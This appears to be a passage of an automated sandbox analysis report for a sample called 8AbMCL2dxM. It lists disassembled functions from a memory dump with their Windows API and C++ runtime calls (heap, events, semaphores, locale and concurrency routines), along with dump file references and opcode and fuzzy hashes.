                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: _free$AllocateHeap
                                      • String ID:
                                      • API String ID: 3033488037-0
                                      • Opcode ID: 3b6606b9a506dfbf61ea3186e05546fb9092e7b6ca4f9b3493f494ab39bedb99
                                      • Instruction ID: 50070de58ad73f7771b471db6b9b2de92f4ba5862b3474bb3f3f8264ef1db318
                                      • Opcode Fuzzy Hash: 3b6606b9a506dfbf61ea3186e05546fb9092e7b6ca4f9b3493f494ab39bedb99
                                      • Instruction Fuzzy Hash: 0851A272A00704AFDB24DF6DC841BAA77F9EF88720F148669E84DD7250E731EA01CB81
                                      Function 0097084F Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: _free
                                      • String ID:
                                      • API String ID: 269201875-0
                                      • Opcode ID: 84b7f865e3340b4e3d374949733f574e01d72a1da2fc15ac0836ed7ab2defa8f
                                      • Instruction ID: 0a0bbb6cce30dda955ddbec4030bd3221d8fca7f8537fe56f8bd0f4b4342ed3a
                                      • Opcode Fuzzy Hash: 84b7f865e3340b4e3d374949733f574e01d72a1da2fc15ac0836ed7ab2defa8f
                                      • Instruction Fuzzy Hash: 6841A333A00210DFDB14DF79C981B5AB7A5EFC5714F158569E519EB381EA31AD01CB81
                                      Function 00940550 Relevance: 7.6, APIs: 5, Instructions: 128COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00940850: SetEvent.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00990C30,000000FF), ref: 0094092C
                                        • Part of subcall function 009404B0: WaitForSingleObjectEx.KERNEL32(00000000,000000FF,00000000,?,BA3649C5,BA3649C5,?,?,?,00000000,00000000,BA3649C5,BA3649C5), ref: 009404F5
                                      • SetEvent.KERNEL32(00000000), ref: 00940609
                                      • ReleaseSemaphore.KERNEL32(00000000,?,00000000), ref: 0094061D
                                      • ReleaseSemaphore.KERNEL32(?,?,00000000), ref: 00940642
                                      • CloseHandle.KERNEL32(00000000,?,BA3649C5,BA3649C5,0093F4C4,?,BA3649C5), ref: 00940676
                                      • SetEvent.KERNEL32(00000000,?,BA3649C5,BA3649C5,0093F4C4,?,BA3649C5), ref: 009406B3
                                        • Part of subcall function 008B50A0: CreateEventA.KERNEL32(?,?,?,?,BA3649C5,BA3649C5,?,009404E2,?,BA3649C5,BA3649C5,?,?,?,00000000,00000000), ref: 008B50D4
                                        • Part of subcall function 008B50A0: CloseHandle.KERNEL32(00000000,?,009404E2,?,BA3649C5,BA3649C5,?,?,?,00000000,00000000,BA3649C5,BA3649C5), ref: 008B50EF
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: Event$CloseHandleReleaseSemaphore$CreateObjectSingleWait
                                      • String ID:
                                      • API String ID: 1436492870-0
                                      • Opcode ID: b261db0c13e9a07192ee90a789f5d019efa937781125dfb9d22520210d1ad811
                                      • Instruction ID: add85a7306f925497aca0a9d8a241e86c105913576ee57a579dc7450e192173e
                                      • Opcode Fuzzy Hash: b261db0c13e9a07192ee90a789f5d019efa937781125dfb9d22520210d1ad811
                                      • Instruction Fuzzy Hash: 06519D70A006159FDF11DF68C884B6ABBB4EB88324F1542A9EA15AB392D735ED11CB90
                                      Function 00952466 Relevance: 7.6, APIs: 5, Instructions: 123COMMON
                                      Download Yara Rule
                                      APIs
                                      • Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 0095249A
                                        • Part of subcall function 0094D317: Concurrency::details::ContextBase::ThrowContextEvent.LIBCONCRT ref: 0094D338
                                      • Concurrency::details::InternalContextBase::FindWorkForBlockingOrNesting.LIBCONCRT ref: 009524F9
                                      • Concurrency::details::InternalContextBase::PrepareForUse.LIBCONCRT ref: 0095251F
                                      • Concurrency::details::SchedulerBase::ReleaseInternalContext.LIBCONCRT ref: 0095253F
                                      • Concurrency::location::_Assign.LIBCMT ref: 0095258C
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: Context$Base::Concurrency::details::$Internal$Event$AssignBlockingConcurrency::location::_FindNestingPrepareReleaseSchedulerThrowTraceWork
                                      • String ID:
                                      • API String ID: 1794448563-0
                                      • Opcode ID: b46d12727a5e15c106941ff7e1f2df071796fd2437aa8f516354e01f1c8c8710
                                      • Instruction ID: f42352b21ca67ac04af6142f41af3b02b0f9defe21ffe9364eba2ea9b06fe31b
                                      • Opcode Fuzzy Hash: b46d12727a5e15c106941ff7e1f2df071796fd2437aa8f516354e01f1c8c8710
                                      • Instruction Fuzzy Hash: CC412970604210ABCF19DF29C896BBDBB78EF85750F144059F8069B382EF349D49C791
                                      Function 008EC6A0 Relevance: 7.6, APIs: 5, Instructions: 107COMMON
                                      Download Yara Rule
                                      APIs
                                      • std::_Lockit::_Lockit.LIBCPMT ref: 008EC6D6
                                      • std::_Lockit::_Lockit.LIBCPMT ref: 008EC6F6
                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 008EC716
                                      • std::_Facet_Register.LIBCPMT ref: 008EC7B1
                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 008EC7C9
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
                                      • String ID:
                                      • API String ID: 459529453-0
                                      • Opcode ID: 29d4c5a2ee27f0f78f87424781b419f5d44d9989af46c992e06555025147dd8d
                                      • Instruction ID: 5a8b24e6238867e18f694d07c161e143f159b46b5d1ff1a6f8f62b3548997b66
                                      • Opcode Fuzzy Hash: 29d4c5a2ee27f0f78f87424781b419f5d44d9989af46c992e06555025147dd8d
                                      • Instruction Fuzzy Hash: FB41DF72D04269DBCB20DF59D881BAEB7B4FB55710F14416AE806AB382DB30AD42CBC1
                                      Function 0094CAB1 Relevance: 7.6, APIs: 5, Instructions: 88COMMON
                                      Download Yara Rule
                                      APIs
                                      • _SpinWait.LIBCONCRT ref: 0094CAD6
                                        • Part of subcall function 00942B12: _SpinWait.LIBCONCRT ref: 00942B2A
                                      • Concurrency::details::ContextBase::ClearAliasTable.LIBCONCRT ref: 0094CAEA
                                      • Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 0094CB1C
                                      • List.LIBCMT ref: 0094CB9F
                                      • List.LIBCMT ref: 0094CBAE
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: ListSpinWait$AcquireAliasBase::ClearConcurrency::details::Concurrency::details::_ContextLock::_ReaderTableWriteWriter
                                      • String ID:
                                      • API String ID: 3281396844-0
                                      • Opcode ID: fe1406ce8a18fd87bc25b532ffdb22d3df620a8786811f36146b99aab13f8c73
                                      • Instruction ID: 6b3659519cba3f03d8a9871c63767a3a63cb242fb12cb040daa2d7139f0fcdb7
                                      • Opcode Fuzzy Hash: fe1406ce8a18fd87bc25b532ffdb22d3df620a8786811f36146b99aab13f8c73
                                      • Instruction Fuzzy Hash: 843159B1906655DFCB64EFA4C592AEDB7B0FF44308F14416AE80177692DB316D04CBA1
                                      Function 009553C9 Relevance: 7.6, APIs: 5, Instructions: 80threadCOMMON
                                      Download Yara Rule
                                      APIs
                                      • SetEvent.KERNEL32(?,00000000,?), ref: 0095541A
                                      • Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 00955402
                                        • Part of subcall function 0094D317: Concurrency::details::ContextBase::ThrowContextEvent.LIBCONCRT ref: 0094D338
                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 0095544B
                                      • Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 0095547D
                                      • SwitchToThread.KERNEL32(00000005,00000004,00000000,?,?,?,?,?,?,?,009CC3E8), ref: 00955482
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: Context$Event$Base::Concurrency::details::$ThrowTrace$Exception@8SwitchThread
                                      • String ID:
                                      • API String ID: 2412095092-0
                                      • Opcode ID: cb528256eae75ec39819b8acc833510e19b3d08a85775813bf4e3d91c9202a4c
                                      • Instruction ID: db3443f810c9e242b7dbac13313d34732406db7be190fa443374cdfd9e973ee5
                                      • Opcode Fuzzy Hash: cb528256eae75ec39819b8acc833510e19b3d08a85775813bf4e3d91c9202a4c
                                      • Instruction Fuzzy Hash: B92129B5600214AFCB00EF69CC45E6EB7BCEB88761B01401AFA06E3291CA70AD418BA1
                                      Function 0094E5C8 Relevance: 7.6, APIs: 5, Instructions: 79COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • __EH_prolog3_catch.LIBCMT ref: 0094E5CF
                                      • Concurrency::SchedulerPolicy::_ValidPolicyValue.LIBCONCRT ref: 0094E61B
                                      • std::bad_exception::bad_exception.LIBCMT ref: 0094E631
                                      • std::bad_exception::bad_exception.LIBCMT ref: 0094E69D
                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 0094E6AB
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: std::bad_exception::bad_exception$Concurrency::Exception@8H_prolog3_catchPolicyPolicy::_SchedulerThrowValidValue
                                      • String ID:
                                      • API String ID: 3702943636-0
                                      • Opcode ID: 73b05b22fdc0a4a0e7aa1426ccbf1bded4ad3a4d39a774d36d03054804f03ee8
                                      • Instruction ID: 22ac1b3ec3ae72f95f615aadd42494584b789cc80fc09c0a0f6b43ebfaaee1cd
                                      • Opcode Fuzzy Hash: 73b05b22fdc0a4a0e7aa1426ccbf1bded4ad3a4d39a774d36d03054804f03ee8
                                      • Instruction Fuzzy Hash: ED21C2B1900214EFDF04EFA4D886EADB7B4FF95314F21402AF445AB291EB31AE41CB55
                                      Function 0097CDA4 Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetEnvironmentStringsW.KERNEL32(00000000,?,00000002,?,?,009829E2,00000000,?,00000000,00000000), ref: 0097CDAD
                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,009829E2,00000000,?,00000000,00000000), ref: 0097CDD0
                                        • Part of subcall function 00976393: RtlAllocateHeap.NTDLL(00000000,?,?,?,0095833C,?,?,?,?,?,008B1F07,?,?,?), ref: 009763C5
                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,009829E2,00000000,?,00000000,00000000), ref: 0097CDF6
                                      • _free.LIBCMT ref: 0097CE09
                                      • FreeEnvironmentStringsW.KERNEL32(00000000,?,?,009829E2,00000000,?,00000000,00000000), ref: 0097CE18
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                      • String ID:
                                      • API String ID: 336800556-0
                                      • Opcode ID: 5859f0be98d7786716b5b521e7a3e3ed64111a931cac3427982e242f247ea0c0
                                      • Instruction ID: 493c8adfe3df05f91cf1ec14ddcd88e18e30dcb2cd1a9ef20b1c6b38d9440eb1
                                      • Opcode Fuzzy Hash: 5859f0be98d7786716b5b521e7a3e3ed64111a931cac3427982e242f247ea0c0
                                      • Instruction Fuzzy Hash: C3018FB3605615BB27315ABA6C8CD7FAA6DDFC2FA1325812EFD0CD3141EA648D1291F0
                                      Function 0092B06D Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: Maklocstr$Maklocchr
                                      • String ID:
                                      • API String ID: 2020259771-0
                                      • Opcode ID: 450d838af9532c9808856fc70e2fdd600ee6e6a4203d0b32f45f44e905613c0e
                                      • Instruction ID: c6c0db281ca6f672ce098c1c63f6cc96897e99129397378fd360add15838c466
                                      • Opcode Fuzzy Hash: 450d838af9532c9808856fc70e2fdd600ee6e6a4203d0b32f45f44e905613c0e
                                      • Instruction Fuzzy Hash: 6F11B8B1940B50BBE720EBA4E881F17B7ECAF58310F04091AF2A88BA44D375F94487A4
                                      Function 0092C1F7 Relevance: 7.6, APIs: 5, Instructions: 54COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • __EH_prolog3.LIBCMT ref: 0092C1FE
                                      • std::_Lockit::_Lockit.LIBCPMT ref: 0092C208
                                        • Part of subcall function 008B2B00: std::_Lockit::_Lockit.LIBCPMT ref: 008B2B1D
                                        • Part of subcall function 008B2B00: std::_Lockit::~_Lockit.LIBCPMT ref: 008B2B39
                                      • std::_Facet_Register.LIBCPMT ref: 0092C259
                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 0092C279
                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 0092C297
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
                                      • String ID:
                                      • API String ID: 651022567-0
                                      • Opcode ID: 0fa4c47f3b80e5a90ca39d74fd721f96ac148fd0d51b1616050c9e2002e9388f
                                      • Instruction ID: f4b91722997c154bd11cd6472593ee751f6c9460a2b4eef28174f345ef26faab
                                      • Opcode Fuzzy Hash: 0fa4c47f3b80e5a90ca39d74fd721f96ac148fd0d51b1616050c9e2002e9388f
                                      • Instruction Fuzzy Hash: B611ACB1904228DBCF04EFA4D896BEE77B5AF84320F644409E411A72E6CF34DA45CB91
                                      Function 0092C151 Relevance: 7.6, APIs: 5, Instructions: 54COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • __EH_prolog3.LIBCMT ref: 0092C158
                                      • std::_Lockit::_Lockit.LIBCPMT ref: 0092C162
                                        • Part of subcall function 008B2B00: std::_Lockit::_Lockit.LIBCPMT ref: 008B2B1D
                                        • Part of subcall function 008B2B00: std::_Lockit::~_Lockit.LIBCPMT ref: 008B2B39
                                      • std::_Facet_Register.LIBCPMT ref: 0092C1B3
                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 0092C1D3
                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 0092C1F1
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
                                      • String ID:
                                      • API String ID: 651022567-0
                                      • Opcode ID: f688d4ea6124d196bfcd8de421a1117af5c2fb8a1efb202b38aeff9b15ce2c6f
                                      • Instruction ID: 74fb2f4f475f0c1418daed6be9cf137c131b9d9acdf02c24e22fafc336dd8004
                                      • Opcode Fuzzy Hash: f688d4ea6124d196bfcd8de421a1117af5c2fb8a1efb202b38aeff9b15ce2c6f
                                      • Instruction Fuzzy Hash: 1311C2B19442249BCF04EFA8D856BEE77B5AF84320F240409F801A73E2CF349A40DB91
                                      Function 0092C29D Relevance: 7.6, APIs: 5, Instructions: 54COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • __EH_prolog3.LIBCMT ref: 0092C2A4
                                      • std::_Lockit::_Lockit.LIBCPMT ref: 0092C2AE
                                        • Part of subcall function 008B2B00: std::_Lockit::_Lockit.LIBCPMT ref: 008B2B1D
                                        • Part of subcall function 008B2B00: std::_Lockit::~_Lockit.LIBCPMT ref: 008B2B39
                                      • std::_Facet_Register.LIBCPMT ref: 0092C2FF
                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 0092C31F
                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 0092C33D
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
                                      • String ID:
                                      • API String ID: 651022567-0
                                      • Opcode ID: 168c2b83003995c7535364c8ac0d08777d437947ce8359c25270644684f49fe5
                                      • Instruction ID: da1108fe398ec0e1c4edf847989fa26f3265a50794402d501ea295723fa48a17
                                      • Opcode Fuzzy Hash: 168c2b83003995c7535364c8ac0d08777d437947ce8359c25270644684f49fe5
                                      • Instruction Fuzzy Hash: B811A0719046249BCF04EBA4E856BEE77B4AF94720F240809E411A72D6CF749A44D791
                                      Function 0092C343 Relevance: 7.6, APIs: 5, Instructions: 54COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • __EH_prolog3.LIBCMT ref: 0092C34A
                                      • std::_Lockit::_Lockit.LIBCPMT ref: 0092C354
                                        • Part of subcall function 008B2B00: std::_Lockit::_Lockit.LIBCPMT ref: 008B2B1D
                                        • Part of subcall function 008B2B00: std::_Lockit::~_Lockit.LIBCPMT ref: 008B2B39
                                      • std::_Facet_Register.LIBCPMT ref: 0092C3A5
                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 0092C3C5
                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 0092C3E3
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
                                      • String ID:
                                      • API String ID: 651022567-0
                                      • Opcode ID: 354cb6f5acd68ea80c48b1cb2befb365f0edeb30959435d180ee924a13ffc889
                                      • Instruction ID: b35a44f18fa2d5534556fbf0f17313b1b3b835eccae3cc040371c5adc5beb9b8
                                      • Opcode Fuzzy Hash: 354cb6f5acd68ea80c48b1cb2befb365f0edeb30959435d180ee924a13ffc889
                                      • Instruction Fuzzy Hash: 2611CEB29042299BCF04EBA4D856BEE77B5BF84720F644409F811A73E6CF749E40CB91
                                      Function 0092C5DB Relevance: 7.6, APIs: 5, Instructions: 54COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • __EH_prolog3.LIBCMT ref: 0092C5E2
                                      • std::_Lockit::_Lockit.LIBCPMT ref: 0092C5EC
                                        • Part of subcall function 008B2B00: std::_Lockit::_Lockit.LIBCPMT ref: 008B2B1D
                                        • Part of subcall function 008B2B00: std::_Lockit::~_Lockit.LIBCPMT ref: 008B2B39
                                      • std::_Facet_Register.LIBCPMT ref: 0092C63D
                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 0092C65D
